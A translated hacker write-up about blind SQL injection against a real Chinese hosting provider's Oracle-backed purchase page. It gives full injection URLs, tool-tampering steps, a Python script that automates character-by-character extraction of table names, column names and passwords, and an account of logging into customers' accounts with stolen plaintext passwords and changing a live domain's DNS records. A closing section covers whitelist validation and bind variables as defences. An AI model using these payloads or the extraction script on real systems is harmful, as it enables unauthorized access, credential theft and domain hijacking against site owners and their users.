For a hacker, the most important thing in an attack is the idea, not having the best or the latest tools.
Wan Net's Embarrassment: An Oracle Injection Vulnerability in Wan Net Exposed
Some time ago, after finishing the project I had on hand, I was idly browsing the web. In a group chat, friends were saying they had set up this or that site, welcome everyone to come and play or download stuff, with their own .com or .com.cn domain names. I was envious. When could I have my own host and my own top-level domain... daydreaming. Thinking of applying for a host and a domain name, I naturally thought of China Wan Net (too famous in China ^_^). Let's go and see how much it costs. I opened the Wan Net home page. Wow, a standard ASP.NET host is 1600 yuan a year, and a domain is 200. I was just doing the sums when I noticed the member login box in the upper right corner of the home page, and my usual security habits got the better of me. Let's see if there are any holes and grab a member account, just for fun, no harm done.
Browsing around the site, I read: Wan Net (www.net.cn) is China's largest domain name and website hosting service provider, the flagship of the Chinese Internet service industry, with system engineers, Cisco router experts, Oracle database experts, Microsoft MCSE certified engineers, Java/ASP/Perl/C programming masters and network security experts. Cough... sweat. I had no idea how many layers of security a big site's servers would have. Maybe N advanced IDSs and firewalls, maybe a honeypot lying in wait, and patches applied promptly. I took out a port scanner and swept... depressing. It seemed there was no hope of breaking in at the server level.
I kept browsing and noticed something: Wan Net's site is written in ASP. Everyone knows ASP + MSSQL injection; plenty of sites have suffered from it. Would a site this big have the same problem? No matter, let's try. I found a link:
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341
This is the page for purchasing a virtual host. First I tested it with the classic and 1=1 / and 1=2 method. Both returned a "Type mismatch: 'CDbl'" error (which makes sense in hindsight: the parameter sits inside single quotes, so 10341 and 1=1 is just a string that matches nothing, and the page then fails converting an empty result). Hmm, does it really not work? Don't give up yet; let's find out what database it is. Append a single quote to the parameter, submit, and the page returns an error:
OraOLEDB error '80004005'
ORA-01756: quoted string not properly terminated
/HAS_CLIENT/BUY/VIR_HOST/vir_host1_sb.asp, line 285
Haha, it uses Oracle. No wonder. An unbalanced quote usually produces exactly this error with Oracle, just as MSSQL produces its own "unclosed quotation mark" error. We can be fairly certain there is an injection vulnerability, and that the backend is Oracle.
Encouraged, I went on to a further test. Note: the following steps are the foundation of everything that follows; they are very important.
Submit, one at a time:
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341' and 0<>(select count(*) from all_tables) and '1'='1
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20user_tables)%20and%20'1'='1
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341' and 0<>(select count(*) from user_tab_columns) and '1'='1
These check whether the Oracle data dictionary views we are guessing at, all_tables, user_tables and user_tab_columns, are accessible. We will rely on these views later; without them there is nothing to play with.
All three pages returned normally. That shows the views exist, that the SQL we submitted was accepted and processed by the program, and therefore that this page really does have a SQL injection vulnerability. Yeah!
After sending Wan Net N messages without any response, I began further penetration.
Now the formal injection begins. Of course, if the page had not returned normally for the system-view queries, most of what follows would not work. ^_^
First let's sort out the approach. The most critical data is user account information, above all usernames and passwords; that is our primary goal. How do we locate it in an Oracle database? Like this: user_tab_columns lists every column of every table owned by the current user, so we start there. Submit:
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341' and 0<>(select count(*) from user_tab_columns where column_name like '%25Password%25')%20and%20'1'='1
This asks whether user_tab_columns holds any column whose name contains the string Password.
The page returned normally. Haha, so there is a column name containing PASSWORD.
We could equally test PWD, Admin, Pass and other sensitive names; here we start with Password. We now know that a column name contains Password. How do we find out which table contains it? Like this, submit:
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341' and 0<>(select count(*) from user_tab_columns where column_name like '%25Password%25'%20and%20substr(table_name,1,1)='a')%20and%20'1'='1
This asks whether, among the tables containing a Password column, there is one whose name starts with a. If so, the page returns normally; otherwise it reports:
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'CDbl'
/HAS_CLIENT/INCLUDE/VH_GETPROPERTY.ASP, line 46
(Figure: the type-mismatch error page.)
But doing this by hand is... exhausting... 26 letters... So I used NBSI's background admin-page scanner to automate the detection, like this:
NBSI's admin-page scanner takes its paths from Dict_Admin.txt. Replace the file's contents with:
vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20column_name%20like%20'%25Password%25'%20and%20substr(table_name,1,1)='A')%20and%20'1'='1
vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20column_name%20like%20'%25Password%25'%20and%20substr(table_name,1,1)='B')%20and%20'1'='1
vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20column_name%20like%20'%25Password%25'%20and%20substr(table_name,1,1)='C')%20and%20'1'='1
...
Then fill in the scan base address in the program, http://www.net.cn/has_client/buy/vir_host/, and click start. NBSI issues a GET for each path we set. There is one problem: NBSI also lists 500 responses in the result pane, and we only want it to show the 200 OK addresses. How? Bring out WPE Pro, a tool for intercepting and modifying packets in real time. We use it to rewrite the returned 500 error into a 404 page, so NBSI no longer lists the 500 addresses. I won't explain WPE usage here; there are tutorials online. Screenshot: (figure).
This makes our guessing far more efficient.
The scan showed tables with a sensitive column whose names begin with C, D, H, M, S and V. Let's take them one at a time. Tiring :)
Start with C. There may be many tables beginning with C; which one do we need? We continue to guess the second character. Change the contents of Dict_Admin.txt (hereafter "the admin file") with replace-all to:
vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20column_name%20like%20'%25Password%25'%20and%20substr(table_name,1,2)='Ca')%20and%20'1'='1
vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20column_name%20like%20'%25Password%25'%20and%20substr(table_name,1,2)='Cb')%20and%20'1'='1
vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20column_name%20like%20'%25Password%25'%20and%20substr(table_name,1,2)='Cc')%20and%20'1'='1
...
Run the scan again. OK, the first two characters we need are Cu. Then the third... and so on, round and round. Finally we get CustomerMST as the table that contains the sensitive column. Seeing Customer... hey, we're on to something. Of course, once you have guessed about five characters, you can submit:
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341' and 0<>(select count(*) from user_tables where table_name like '%25XXXXX%25' and length(table_name)=N) and '1'='1
to determine the length of the table name you are guessing. This is more accurate and faster.
Once the table name has been guessed, submit:
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341' and 0<>(select count(*) from user_tables where table_name='customermst') and '1'='1
to confirm it. The page returned normally. OK :)
Onward. We still don't know the actual column names, so let's guess the columns of CustomerMST. Oracle gives us no quick error-based trick for dumping field names the way MSSQL does, so we can only guess; tiring... Fortunately we have our home-made NBSI + WPE detector... *_*. Enough chatter, let's guess the column names. Change the admin file to:
vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='Customermst'%20and%20substr(column_name,1,1)='a')%20and%20'1'='1
vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='Customermst'%20and%20substr(column_name,1,1)='b')%20and%20'1'='1
vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='Customermst'%20and%20substr(column_name,1,1)='c')%20and%20'1'='1
...
This finds which letters the column names of CustomerMST start with. A page that returns normally, that is 200 OK, means such a column exists.
The scan showed column names starting with A, B, C, E, F, G, I, L, M, O, P, R, S and U. Dizzy, so many... No choice, take it slowly. Start with A.
The method is the same as for the table name. Change the admin file to:
vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='Customermst'%20and%20substr(column_name,1,2)='aa')%20and%20'1'='1
vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='Customermst'%20and%20substr(column_name,1,2)='ab')%20and%20'1'='1
vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='Customermst'%20and%20substr(column_name,1,2)='ac')%20and%20'1'='1
...
OK, the first two characters are Ar; continue... and finally the name is Areaid. Note that a single position may yield several hits, which means several column names: for example, when testing the second character under B, both Bi and Bu returned 200 OK, so there are column names starting with Bi and with Bu. Carrying on like this, we eventually got all the column names in CustomerMST (wiping sweat...):
Areaid
Birthday
Bizid
Businessstatus
Channel_staffID
CityID
Contact
COUNTRY
Customerid
CustomerIndustry
Customerorigintype
Emailbackup
.
.
.
Password
.
.
.
UserID
.
.
Looking at the names, the three fields Customerid, Password and Userid are clearly the important ones.
Wan Net logs you in with a numeric ID and a password. Which of these two IDs is used for login? Like this: at the login box on the Wan Net home page you can look up a customer's numeric ID by username. Hmm... but what username? We know nothing about the data. Browsing the home page, I found a "new customers" section at the bottom, and among them a real-estate portal, SouFun:
http://www.soufun.com/ Well, let's use SouFun's name ~ ^_^
OK, the lookup gives SouFun's user ID as 10529112. Now let's determine which field holds the ID. Submit:
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341' and 0<>(select count(*) from customermst where customerid='10529112')%20and%20'1'='1
Wow, the page did not return normally; it errored. Not this field then. Submit again:
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341' and 0<>(select count(*) from customermst where userid='10529112')%20and%20'1'='1
OK, this one returned normally, so the userid field is the login ID. The same method shows that the Customerid field is the username.
With the fields known, let's guess the password, still for this user. Still guessing, of course, but at last it's the password itself, hehe. Not tired at all. Change the admin file to:
vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20customermst%20where%20userid='10529112'%20and%20substr(password,1,1)='a')%20and%20'1'='1
vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20customermst%20where%20userid='10529112'%20and%20substr(password,1,1)='b')%20and%20'1'='1
vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20customermst%20where%20userid='10529112'%20and%20substr(password,1,1)='c')%20and%20'1'='1
...
vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20customermst%20where%20userid='10529112'%20and%20substr(password,1,1)='0')%20and%20'1'='1
vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20customermst%20where%20userid='10529112'%20and%20substr(password,1,1)='1')%20and%20'1'='1
vir_host1_sb.asp?packageid=10341'and%200<>(select%20count(*)%20from%20customermst%20where%20userid='10529112'%20and%20substr(password,1,1)='2')%20and%20'1'='1
...
The digits are included because passwords are usually letters and digits :). The above guesses the first character of the password of the user whose ID is 10529112. After a few seconds the first character came back: n. Continue with the second, the same way as with the names; the only difference is that here there is only one hit per position. Finally, the password of user 10529112 is n****. Dizzy: the password is stored unencrypted... Database and security experts...?
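The whole procedure above (confirm the dictionary views, find a table with a Password column, guess its name and its columns one character at a time, then guess one user's password) is the same yes/no question asked over and over, which is exactly what a script does better than NBSI plus WPE. The following is an added example, not the article's tooling: the attacker side only needs a function that answers whether an injected condition held, and for offline use the target is a constructed stand-in in which the page's query `select * from table where packageid='<input>'` is re-implemented over an in-memory sqlite database (sqlite stands in for Oracle; it supports substr and length, so the same conditions evaluate). The names CUSTOMERMST, USERID and PASSWORD are the ones the article found; the rows, the USER_TAB_COLUMNS stand-in table and the VIR_HOST_PACKAGE table are made up. Identifiers are guessed in upper case because Oracle stores unquoted identifiers in upper case and compares strings case-sensitively; the mixed-case names in the article only work if the schema was created with quoted identifiers.

```python
"""Boolean-based blind extraction, the article's NBSI + WPE loop as a script.

Added example, not the article's code.  sqlite stands in for Oracle, and all
table contents below are constructed."""
import sqlite3
import string
from typing import Callable, Dict, List

Ask = Callable[[str], bool]          # True when the injected condition holds

UPPER = string.ascii_uppercase + string.digits + "_"   # data-dictionary identifiers
MIXED = string.ascii_letters + string.digits           # row data such as passwords


def make_condition(table: str, filters: List[str], column: str,
                   prefix: str, exact: bool = False) -> str:
    """The boolean clause the article appends after the closing quote, e.g.
    0<>(select count(*) from user_tab_columns where column_name like '%PASSWORD%'
        and substr(table_name,1,2)='CU')"""
    clauses = list(filters) + [f"substr({column},1,{len(prefix)})='{prefix}'"]
    if exact:                         # also require the value to end here
        clauses.append(f"length({column})={len(prefix)}")
    return f"0<>(select count(*) from {table} where {' and '.join(clauses)})"


def enumerate_values(ask: Ask, table: str, filters: List[str],
                     column: str, charset: str) -> List[str]:
    """Prefix search, one yes/no request per candidate character.

    Breadth-first, so several values sharing a prefix (the article's Bi... and
    Bu... columns) are all found; the length check decides when a value is
    complete, which also handles one value being a prefix of another."""
    found: List[str] = []
    frontier = [""]
    while frontier:
        next_frontier = []
        for prefix in frontier:
            for ch in charset:
                candidate = prefix + ch
                if ask(make_condition(table, filters, column, candidate)):
                    next_frontier.append(candidate)
                    if ask(make_condition(table, filters, column, candidate, exact=True)):
                        found.append(candidate)
        frontier = next_frontier
    return sorted(found)


class VulnerablePage:
    """Constructed stand-in for vir_host1_sb.asp.  The request parameter is
    concatenated into the query, which is the bug the article exploits.  The
    real page answered a failed lookup with a 500 'Type mismatch: CDbl'; here
    True/False plays the role of 200/500.  A plain table mimics Oracle's
    USER_TAB_COLUMNS view.  All rows are made up."""

    def __init__(self) -> None:
        self.db = sqlite3.connect(":memory:")
        self.db.executescript("""
            create table VIR_HOST_PACKAGE (PACKAGEID text, NAME text);
            insert into VIR_HOST_PACKAGE values ('10341', 'standard ASP.NET host');
            create table CUSTOMERMST (CUSTOMERID text, USERID text, PASSWORD text);
            insert into CUSTOMERMST values ('soufun', '10529112', 'n7kq2');
            create table USER_TAB_COLUMNS (TABLE_NAME text, COLUMN_NAME text);
            insert into USER_TAB_COLUMNS values
              ('VIR_HOST_PACKAGE', 'PACKAGEID'), ('VIR_HOST_PACKAGE', 'NAME'),
              ('CUSTOMERMST', 'CUSTOMERID'), ('CUSTOMERMST', 'USERID'),
              ('CUSTOMERMST', 'PASSWORD'), ('CUSTOMERMST', 'BIRTHDAY'),
              ('CUSTOMERMST', 'BIZID');
        """)
        self.requests = 0

    def get(self, packageid: str) -> bool:
        """True if the page rendered (a row came back), False if it errored."""
        self.requests += 1
        sql = f"select * from VIR_HOST_PACKAGE where PACKAGEID='{packageid}'"  # vulnerable
        try:
            return self.db.execute(sql).fetchone() is not None
        except sqlite3.Error:         # broken SQL: the ASP page would 500 too
            return False


def ask_via(page: VulnerablePage) -> Ask:
    """Wrap a page as the oracle: close the string literal, add the condition,
    and re-balance the quotes with and '1'='1 exactly as the article does."""
    return lambda condition: page.get(f"10341' and {condition} and '1'='1")


def extract_credentials(ask: Ask, userid: str) -> Dict[str, object]:
    """The article's path end to end: tables holding a *PASSWORD* column, that
    table's columns, then one user's password."""
    tables = enumerate_values(ask, "user_tab_columns",
                              ["column_name like '%PASSWORD%'"], "table_name", UPPER)
    if not tables:
        return {"tables": [], "columns": [], "password": None}
    table = tables[0]
    columns = enumerate_values(ask, "user_tab_columns",
                               [f"table_name='{table}'"], "column_name", UPPER)
    secrets = enumerate_values(ask, table, [f"userid='{userid}'"], "password", MIXED)
    return {"tables": tables, "columns": columns,
            "password": secrets[0] if secrets else None}


if __name__ == "__main__":
    page = VulnerablePage()
    print(extract_credentials(ask_via(page), "10529112"), "in", page.requests, "requests")
```

Against a live target, `ask_via` would be replaced by a function that sends the same string URL-encoded (the `%` in the `like` pattern becomes `%25`, as in the article's URLs) and returns whether the response was a 200 rather than a 500; the search code does not change. The cost is one request per candidate character per position, which is why the page's 200/500 difference, rather than any error text, is what the script reads.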
Password in hand, let's go and log in, hehe.
Haha, login OK! ... The available balance is actually -130 yuan... dizzy! Overdrawn? That hurts T_T. No matter! Find the balance field and update it! Hey... unfortunately, after N attempts I still don't know how to get an UPDATE or INSERT through this injection, 5555555. If any master has a good method, let's exchange notes :)
Of course, after logging in we have full rights over this account. Let's look at paid-product management... what is all this stuff, dizzy! Let's look at this user's financial information:
Hmm... open the most recent transaction. It turns out 130 yuan was transferred to 10144167. Is 10144167 a rich account? :P
I cracked 10144167's password, U******, and logged in. Haha, it turned out to be a domain-name distribution alliance partner, a rich one ~ balance 329 ^_^. Open paid-product management: so many domain names ~ :p At the bottom of the page, open domain name resolution, and there it is, a Chinese universal domain name registration: SouFun.com.China. Click it and we are on the DNS resolution service page for SouFun.com.China, where we can change its resolution and so control the domain.
At this point I no longer cared about grabbing a member account, because the danger here is far too great. Think about it: with a user's account and password we log in and can easily change where a purchased domain name points, to any location we choose. Imagine a malicious attacker pointing a business site's domain at a fake site of his own: the account information users enter on that business site would have no security at all, and every visit to that domain would go astray. For users who bought virtual hosting, the attacker can take full control of the site through the site management system Wan Net provides; that harm needs no explanation.
For Wan Net itself, all of its business could be affected: its data can be read and tampered with at will. I doubt any customer would dare to sign up, huh.
As a demonstration, using one of the many domain names in that account: I want szsxmd.gd.cn to resolve to the well-known security site
www.xfocus.net (XFocus). First I ping
www.xfocus.net and get the IP 202.106.127.50. Then I enter the domain name resolution service, add a record for szsxmd.gd.cn in its resolution settings, and point it at 202.106.127.50. (Figure.)
A few hours later the resolution takes effect. Visiting szsxmd.gd.cn brings us to the XFocus page :)
Pinging szsxmd.gd.cn from the command line resolves to 202.106.127.50 :)
The other possible harms are obvious and fairly serious; I did not actively demonstrate them.
The database is the crown jewels of a site. Through this injection we can fully control the data in it: not just user account information but every piece of data in the database, at our leisure. If UTL_FILE has been granted to PUBLIC, it can also be used with a UNION query to read files on the server, a bit like load_file() in PHP/MySQL injection; and UPDATE is possible too. I am still a rookie at injecting Oracle and have not managed UPDATE/INSERT or more advanced injection attacks. Oracle injection can only be done by guessing, and there is no automated tool for it; I used NBSI's background scanner plus WPE to improve efficiency. But there are many masters out there, and automated tools will appear soon enough. ^_^
Here are the statements used in this injection:
0<>(select count(*) from all_tables) and '1'='1
  Tests whether the all_tables view is visible; confirms the injection.
0<>(select count(*) from user_tab_columns where column_name like '%25keyword%25') and '1'='1
  Tests whether any column name contains the keyword.
0<>(select count(*) from user_tab_columns where column_name like '%25keyword%25' and substr(table_name,1,1)='a') and '1'='1
  Tests whether a table containing such a column has a name starting with a; the table name is guessed one character at a time.
0<>(select count(*) from user_tables where table_name like '%25keyword%25' and length(table_name)=n) and '1'='1
  Guesses the length of the table name containing the keyword.
0<>(select count(*) from user_tab_columns where table_name='name' and substr(column_name,1,1)='a') and '1'='1
  Guesses column names.
0<>(select count(*) from tablename where column1='xxxxxxx' and substr(column2,1,1)='a') and '1'='1
  Guesses data.
So what is the principle behind this Oracle injection? Let me explain using the page we injected:
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341
The query statement in the ASP source is probably something like:
Select * from table where packageId='10341'
As attackers facing a closed-source program, we have no way of knowing the exact source; we can only infer its rough structure from the error messages, so this is an approximation.
Enough chatter, let's analyse. When we access this page, the ASP program queries the table according to the parameter 10341 submitted in the URL and returns the result to us. From our tests, this parameter is not filtered at all before being placed into the query statement, and that gives us our opening. When we submit
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341' and 0<>(Select Count(*) from all_tables) and '1'='1
the query statement in the ASP program becomes:
Select * from table where packageid='10341' and 0<>(Select Count(*) from all_tables) and '1'='1'
So we have successfully inserted the query we want into the program's original query. Unlike the usual MSSQL trick of commenting out the rest of the statement, here we keep the whole statement valid: the trailing and '1'='1 is there to balance the quotes so the statement parses and the page renders. For example
http://www.net.cn/has_client/buy/vir_host/vir_host1_sb.asp?packageid=10341' and 0<>(Select Count(*) from all_tables) and '1'='1' and 'x'='x
also returns the page normally ^_^.
To prevent this injection, it is in principle enough to validate the parameters submitted in the URL strictly: reject single quotes, SQL keywords and the like, and the attacker has no way in. Concretely, take the string after the ? in the URL, look for single quotes, semicolons, SQL keywords and so on, and on a hit jump straight to a custom error page. Personally I think this is a good approach; against an attacker who cannot see the source, it is very nearly a dead end. A stronger form of the same idea is to use a whitelist rather than a blacklist: packageid is a number (the page converts it with CDbl), so anything that is not all digits can be rejected outright. And whatever survives validation should be handed to Oracle as a bind variable in a parameterized command rather than concatenated into the SQL text, so that it can only ever be compared as a value and never parsed as SQL. A keyword blacklist on its own has to anticipate every encoding and variation an attacker may try.
Network security has many facets, and every link must be looked after. Think of a chain: if any link has a problem, the whole chain breaks. This Wan Net vulnerability looks like a small problem, but its impact is very large: it makes it easy to change where Wan Net customers' domain names point, and if I pointed a large number of domain names at one site, then that site... So security on the Internet is not the job of one component or a few people; it has to be done well from top to bottom. Moreover, after going through so many worm and virus attacks, everyone now generally pays attention to the security of their own servers: firewalls, IDSs, and the telecoms carriers blocking some ports; some sites only have port 80 open. That makes the security of the code running on the server all the more important; a small flaw in one place can bring the whole thing down. Defensive technology keeps improving, and attack methods keep being refreshed. Today there is SQL injection; what will there be tomorrow? Keeping up with the latest attack techniques is, I think, very important for a good administrator. Unfortunately, many programmers have no security awareness when writing code, and administrators simply put the code on the server and assume the server is secure (this is how it is, huh), so code-level holes become the breakthrough.
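The query construction described in the principle section above, and the two defences just discussed, side by side, as an added example that is not the page's own code. The ASP source was never available, so the handler is modelled in Python over an in-memory sqlite database standing in for Oracle (sqlite_master plays the role of all_tables in the payload). The table VIR_HOST_PACKAGE, its row and the status codes returned by the handlers are assumptions; the 200-versus-500 behaviour mirrors what the article observed.

```python
"""Vulnerable concatenation versus validation plus a bind variable.

Added example, not the page's code.  sqlite stands in for Oracle; the table
and its row are constructed."""
import re
import sqlite3
from typing import List, Tuple

SQL_KEYWORDS = ("select", "union", "insert", "update", "delete", "from", "where")


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("create table VIR_HOST_PACKAGE (PACKAGEID text, NAME text)")
    db.execute("insert into VIR_HOST_PACKAGE values ('10341', 'standard ASP.NET host')")
    return db


def build_query_unsafe(packageid: str) -> str:
    """What the vulnerable page does: the raw parameter is pasted between the
    quotes, so a quote in the input closes the literal and the rest is SQL."""
    return f"select * from VIR_HOST_PACKAGE where packageId='{packageid}'"


def handle_unsafe(db: sqlite3.Connection, packageid: str) -> Tuple[int, List[Tuple]]:
    """The page's observable behaviour: 200 with the row, or 500 when the lookup
    returns nothing (the CDbl on an empty field) or the SQL is broken.  That
    200/500 difference is the one bit the blind injection reads per request."""
    try:
        rows = db.execute(build_query_unsafe(packageid)).fetchall()
    except sqlite3.Error:
        return 500, []
    return (200, rows) if rows else (500, [])


def blacklist_rejects(value: str) -> bool:
    """The filter the article proposes: bounce the request on quotes, semicolons
    or SQL keywords.  It stops this payload, but it must anticipate every
    encoding and context an attacker may use, so it is the weaker check."""
    low = value.lower()
    return "'" in low or ";" in low or any(k in low for k in SQL_KEYWORDS)


def is_valid_packageid(value: str) -> bool:
    """Whitelist: the page converts packageid with CDbl, so only digits make
    sense, and everything else is rejected before any SQL is built."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None


def handle_safe(db: sqlite3.Connection, packageid: str) -> Tuple[int, List[Tuple]]:
    """Validation plus a bind variable.  The value travels separately from the
    SQL text, so it can only be compared, never parsed.  sqlite uses '?'; with
    Oracle (python-oracledb / cx_Oracle) the placeholder would be ':pid'."""
    if not is_valid_packageid(packageid):
        return 400, []
    rows = db.execute("select * from VIR_HOST_PACKAGE where packageId=?",
                      (packageid,)).fetchall()
    return (200, rows) if rows else (404, [])


if __name__ == "__main__":
    db = make_db()
    payload = "10341' and 0<>(select count(*) from sqlite_master) and '1'='1"
    print(build_query_unsafe(payload))
    print(handle_unsafe(db, payload), handle_safe(db, payload))
```

Note that with the bind variable the injected string is not rejected by the database; it is simply compared, as a whole, against packageId and matches nothing. The whitelist in front of it exists so that a malformed value is refused with a clear status instead of reaching the database at all.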
I have been paying attention to security since high school, and now I work in this field. It is fair to say the network today is much more secure than before, but technology keeps advancing, and today's security does not mean tomorrow's. Security is an eternal topic. Personally I think worms and viruses are the most effective weapon for strengthening administrators' security awareness, and I believe attacks that exploit code defects will likewise strengthen programmers' awareness of writing secure code. ^_^
Finally, I hope Wan Net will fix this vulnerability; for an expert it would probably take five minutes. Also, strengthen the security of the database itself and add another lock. And is your mail server all right? Incidentally, many sites in China have this problem, such as XX House, XX Department, and so on.
Thank you for your patience in reading my article. My level is limited; if there are any mistakes, corrections are welcome, MSN: War3apollo@hotmail.com. To the wider world, I will always be a rookie :).